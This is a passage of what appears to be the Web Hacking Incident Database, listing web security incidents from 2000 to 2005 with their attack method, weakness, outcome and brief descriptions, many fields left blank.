Attacked Entity Geography:
Incident Description:

An audit of a major Environmental Protection Agency contract management system uncovered significant security lapses that, if exploited by hackers, could have serious consequences for the agency's operations, assets and personnel. The audit focused on lack of monitoring for known vulnerabilities on these systems.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-19: Privacy Fears due to insufficient authentication on CVS drugstore chain web site
WHID ID: 2005-19
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-18: Hacker hits Duke system
WHID ID: 2005-18
Date Occured:
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-17: Leakage of information due to XSS in Hotmail
WHID ID: 2005-17
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-16: MSN site hacked in South Korea
WHID ID: 2005-16
Date Occured:
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Session Hijacking
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

The web site was modified to include password-stealing code.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-15: Unprotected information on the University of Chicago web site
WHID ID: 2005-15
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Files containing sensitive information were left unprotected on the web server.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-14: XSS on Microsoft Xbox site allowed phishing
WHID ID: 2005-14
Date Occured: 11/8/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-13: Hacker attacked weak point on Kakaku.com's Web Site
WHID ID: 2005-13
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Downtime
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-12: Insufficient authentication on Arbela mutual insurance allowed access to private data
WHID ID: 2005-12
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Extranet system accessible to the public.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-11: Samy XSS Worm Hits MySpace
WHID ID: 2005-11
Date Occured: 11/8/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description:

The Samy worm at MySpace is now a classic; both a sophisticated attack and a well-documented one, it became a case study in the web application security field. Recently Robert Hansen (RSnake) wrote a very interesting blog entry about Samy and what has happened to him since.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-10: Indian SATs results leaking
WHID ID: 2005-10
Date Occured: 11/8/2005
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-9: Undisclosed application security issue on Cisco's site forces global passwords reset
WHID ID: 2005-9
Date Occured: 4/8/2005
Attack Method: Abuse of Functionality
Application Weakness: Insecure Indexing
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An undisclosed application security issue on Cisco's web site required resetting the passwords of all registered users.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-8: eBay Redirect Becomes Phishing Tool
WHID ID: 2005-8
Date Occured:
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-7: Hacker Tips Off B-School Applicants
WHID ID: 2005-7
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Parameter tampering to jump into someone else's account data

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-6: Tampering with parameters allows access to others account data on PayMaxx Inc. site
WHID ID: 2005-6
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Parameter tampering enabled jumping into someone else's account data on the PayMaxx Inc. site

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-5: Paris Hilton's T-Mobile online account hacked
WHID ID: 2005-5
Date Occured: 7/11/2005
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Details remain sketchy, but news reports mention social engineering, a guessable secret question for password recovery, and a known vulnerability in BEA WebLogic.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-4: An Israeli debate site vulnerable to XSS
WHID ID: 2005-4
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An Israeli public debate site called Hyde Park has an XSS vulnerability that exposes session cookies.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-3: Misconfiguration issues in paid wireless access and billing applications
WHID ID: 2005-3
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Directory Indexing
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Multiple misconfiguration problems such as browsable directories, physical path disclosure, and default or weak passwords

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-2: Froogle XSS
WHID ID: 2005-2
Date Occured: 7/11/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS was found in Froogle

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2005-1: Gmail Bug Exposes E-mails messages of other users
WHID ID: 2005-1
Date Occured: 7/11/2005
Attack Method: Predictable Resource Location
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Parameter tampering exposed sensitive information in Gmail

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-18: Security flaw exposed in Cahoot bank accounts
WHID ID: 2004-18
Date Occured: 10/25/2007
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Following a software upgrade, Cahoot, a UK-based Internet-only bank, allowed access to user accounts by guessing their user names. At least one page allowed access to an account by specifying only the user name in the URL. The bug was open for 12 days before being discovered.


The site was taken offline for 10 hours to fix the issue. It is a significant incident, as it is one of those rare occasions where a vulnerability was serious enough to force the organization to take the site offline until it was fixed.


We somehow missed this story, so it finds its way into WHID only now, in late 2007.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-17: The CardSystems breach was an SQL Injection hack (Updated)
WHID ID: 2004-17
Date Occured: 4/20/2006
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Finance
Attacked Entity Geography:
Incident Description:

Update (May 27th 2009) - The CardSystems incident is refusing to die. Merrick Bank is now suing Savvis for certifying CardSystems as CISP compliant while its systems were wide open. CISP is a VISA program for certifying credit card processing systems which existed prior to PCI DSS.

The actual damage an attack causes to an organization is rarely disclosed, and coverage focuses on the number of records stolen. In the court documents Merrick reveals that its own damage from the CardSystems incident was $16,000,000! The money was paid to card holders to compensate for losses, and for legal fees and fines.

The case is also interesting as it puts to the test the liability of the certifying entity (in this case Savvis) resulting from its assessment. The results may have a profound influence on the PCI QSA market and therefore on PCI itself. David Navetta posts an excellent legal analysis of the potential implications of the lawsuit.


This entry is a very important one. Most are already familiar with the infamous CardSystems incident, in which hackers stole 263,000 credit card numbers and exposed 40 million more, and several million dollars of fraudulent credit and debit card purchases were made with the resulting counterfeit cards. As a result of the breach CardSystems nearly went out of business and was eventually purchased by PayByTouch. CardSystems is considered by many the most severe publicized information security breach ever, and it caused company shareholders, financial institutions and card holders damage of millions of dollars.

But since the incident was published a year ago, the way in which the breach occurred has remained a mystery.

Recently, new articles about the case (listed below) revealed that the attackers used SQL injection to install a malicious script on the CardSystems web application database; the script was scheduled to run every four days, extract records, zip them and export them to an FTP site.

This is one of the most stunning examples where a web application security hole was used to launch a targeted attack in order to steal money.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked: Credit Card Number
Number of Records: 40000000
Additional Link:
Entry Title: WHID 2004-16: Lycos Free Email XSS
WHID ID: 2004-16
Date Occured: 7/11/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS was found in Lycos Web Mail

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-15: New Variant of Santy Worm Spreads
WHID ID: 2004-15
Date Occured: 12/25/2004
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Worm
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

phpBB worm

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: phpBB
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-14: Santy worm defaces websites using PHP bug
WHID ID: 2004-14
Date Occured: 12/22/2004
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Worm
Attacked Entity Field: Various
Attacked Entity Geography:
Incident Description:

Worm used Google to locate sites vulnerable to OS commanding

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Various
Attacked System Technology: phpBB
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-13: SunTrust site XSS vulnerability exploited for phishing
WHID ID: 2004-13
Date Occured: 11/8/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Phishing based on XSS (the same vulnerability as in the September 2004 attack, but a different attack)

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-12: XSS in Gmail
WHID ID: 2004-12
Date Occured: 7/11/2005
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An XSS was found in Gmail

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-11: Phishers Manipulate SunTrust Site to Steal Data
WHID ID: 2004-11
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

Phishing based on XSS

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-10: SQL Injection and XSS on presidential campaign web sites
WHID ID: 2004-10
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-9: Billing and personal information leakage due to lack of authentication on a phone company web site
WHID ID: 2004-9
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A billing information system required only phone number and zip code to pull up account details

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-8: Broadcast TV announcements changed by hacking the stations web site
WHID ID: 2004-8
Date Occured:
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Process Validation
Outcome: Disinformation
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Previously moderated weather announcements could be changed by the user

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-7: More Scary Tales Involving Big Holes In Web-Site Security - University Sub Service
WHID ID: 2004-7
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.cs.umass.edu/~kevinfu/news/wsj-gomes2.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-6: More Scary Tales Involving Big Holes In Web-Site Security - Tiffany
WHID ID: 2004-6
Date Occured: 8/4/2005
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-5: More Scary Tales Involving Big Holes In Web-Site Security - Gateway
WHID ID: 2004-5
Date Occured: 8/4/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-4: More Scary Tales Involving Big Holes In Web-Site Security - Kohl's
WHID ID: 2004-4
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-3: More Scary Tales Involving Big Holes In Web-Site Security - Iomega
WHID ID: 2004-3
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-2: Biggest Web Problem Isn't About Privacy, It's Sloppy Security - Saks
WHID ID: 2004-2
Date Occured: 8/4/2005
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.cs.umass.edu/~kevinfu/news/wsj-gomes1.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2004-1: Biggest Web Problem Isn't About Privacy, It's Sloppy Security - OpenTable
WHID ID: 2004-1
Date Occured: 8/4/2005
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-9: Defenses lacking at social network sites
WHID ID: 2003-9
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-8: SQL Injection in PetCo.com leads to FTC investigation
WHID ID: 2003-8
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-7: Victoria's Secret reveals far too much
WHID ID: 2003-7
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

View other customers' orders by changing a sequential number within a URL parameter

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-6: Mississippi man blackmails Best Buy
WHID ID: 2003-6
Date Occured: 2/26/2006
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Extortion
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A person was convicted of blackmailing Best Buy: he threatened to expose a breach in the company's web site if not paid $2.5 million.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-5: Car shoppers' credit details exposed in bulk
WHID ID: 2003-5
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

User-submitted information was being stored in a publicly accessible location; the URL was found in the source code of a publicly available web page.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-4: SQL injection on Guess site triggers an FTC inquiry
WHID ID: 2003-4
Date Occured:
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-3: User passwords could be stolen in Microsoft's Passport service
WHID ID: 2003-3
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Password Recovery
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-2: UT Austin hack yields personal info on thousands
WHID ID: 2003-2
Date Occured: 4/4/2006
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

While an old incident, further research into it suggests that it was a web hack. While the initial reports talk about a database break-in, a report in The Register identifies the database as txClass, which is a web-based system.
55,200 social security numbers were stolen, though the hacker claimed that he did not perform the act for profit. He was caught and sentenced to 5 years' probation.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2003-1: FTD.com hole leaks personal information
WHID ID: 2003-1
Date Occured:
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

View other customers' information by modifying a cookie

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-4: Tower Records settles charges over hack attacks
WHID ID: 2002-4
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

View other customers' orders by changing a guessable number within a URL parameter

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-3: Reuters accused of hacking
WHID ID: 2002-3
Date Occured:
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A company put its earnings report on its site before the official release, but did not link to it. Reuters found the document and published it.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-2: Advogato XSS virus account
WHID ID: 2002-2
Date Occured: 7/11/2005
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Improper Output Handling
Outcome: Worm
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2002-1: Flawed authentication at BN.com exposes personal information
WHID ID: 2002-1
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Password Recovery
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Opening an account with a discontinued e-mail address exposes all the information of the discontinued account

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-6: XSS at Microsoft Passport
WHID ID: 2001-6
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pcworld.com/news/article/0,aid,69543,00.asp
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-5: Privacy hole found in Verizon Wireless Web site
WHID ID: 2001-5
Date Occured: 9/6/2001
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: The privacy hole affected users who logged on to the Verizon Wireless Web site and used the My Account feature to view or change their cell phone billing and account information. The Web site address for the feature assigns session identifications sequentially as each user logs in which allows for forceful browsing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-4: Hacked Web site damaged PCs in Japan
WHID ID: 2001-4
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Users who visited the Price Lotto site using Microsoft's IE (Internet Explorer) 4.x and 5.x, automatically downloaded malicious JavaScript that was programmed to alter the software configuration of their PCs.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infoworld.com/articles/hn/xml/01/08/21/010821hnjapmal.html?&_ref=1024727153
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-3: Persistent XSS in Hotmail
WHID ID: 2001-3
Date Occured:
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Persistent XSS (HTML injection) inside an HTML email message sent to Hotmail
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.usatoday.com/tech/news/2001-08-31-hotmail-security.htm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-2: Computer E-Retailer Exposes Credit Card Numbers
WHID ID: 2001-2
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: View other orders by changing a sequential parameter number. Security was provided by client-side JavaScript
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.extremetech.com/article2/0,3973,103782,00.asp
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2001-1: Travelocity exposes customer information
WHID ID: 2001-1
Date Occured:
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Disclosure Only
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Sensitive files were left in a publicly accessible directory of a new web server install
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.com.com/2100-1017-251344.html?legacy=cnet
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-6: Inforeading.com defacement using command injection
WHID ID: 2000-6
Date Occured:
Attack Method: OS Commanding
Application Weakness:
Outcome:
Attacked Entity Field:
Attacked Entity Geography:
Incident Description: Executing local commands using URL parameters
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.inforeading.com/library/infoarticles/InfoReading/logs/deface/02.txt
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2000-5: Eve.com exposes customers order information
